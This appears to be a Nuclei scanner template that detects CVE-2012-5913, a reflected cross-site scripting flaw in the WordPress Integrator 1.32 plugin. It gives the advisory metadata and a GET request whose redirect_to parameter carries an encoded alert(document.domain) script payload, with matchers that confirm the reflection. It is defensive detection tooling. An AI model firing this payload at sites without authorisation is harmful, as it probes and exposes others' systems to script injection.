52 lines
2.2 KiB
YAML
52 lines
2.2 KiB
YAML
id: CVE-2012-5913
|
|
|
|
info:
|
|
name: WordPress Integrator 1.32 - Cross-Site Scripting
|
|
author: daffainfo
|
|
severity: medium
|
|
description: A cross-site scripting vulnerability in wp-integrator.php in the WordPress Integrator module 1.32 for WordPress allows remote attackers to inject arbitrary web script or HTML via the redirect_to parameter to wp-login.php.
|
|
impact: |
|
|
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions.
|
|
remediation: |
|
|
Update the WordPress Integrator plugin to the latest version or apply the vendor-supplied patch to mitigate this vulnerability.
|
|
reference:
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2012-5913
|
|
- https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-integrator-redirect_to-parameter-cross-site-scripting-1-32/
|
|
- http://packetstormsecurity.org/files/111249/WordPress-Integrator-1.32-Cross-Site-Scripting.html
|
|
- http://www.darksecurity.de/advisories/2012/SSCHADV2012-010.txt
|
|
- https://exchange.xforce.ibmcloud.com/vulnerabilities/74475
|
|
classification:
|
|
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
|
|
cvss-score: 4.3
|
|
cve-id: CVE-2012-5913
|
|
cwe-id: CWE-79
|
|
epss-score: 0.01863
|
|
epss-percentile: 0.87064
|
|
cpe: cpe:2.3:a:wordpress_integrator_project:wordpress_integrator:1.32:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: wordpress_integrator_project
|
|
product: wordpress_integrator
|
|
tags: cve,cve2012,wordpress,xss,wp-plugin,packetstorm,wordpress_integrator_project
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/wp-login.php?redirect_to=http%3A%2F%2F%3F1%3C%2FsCripT%3E%3CsCripT%3Ealert%28document.domain%29%3C%2FsCripT%3E'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "</sCripT><sCripT>alert(document.domain)</sCripT>"
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- text/html
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4b0a00483046022100b621695e386fdceb63456bafa440c49d8ef03a88ddd082aff097f38e76a7eae3022100b7baeaaa782c1567cc53216d9581f33f8b26bd8bc96779d1754432ac9bfab362:922c64590222798bb761d5b6d8e72950 |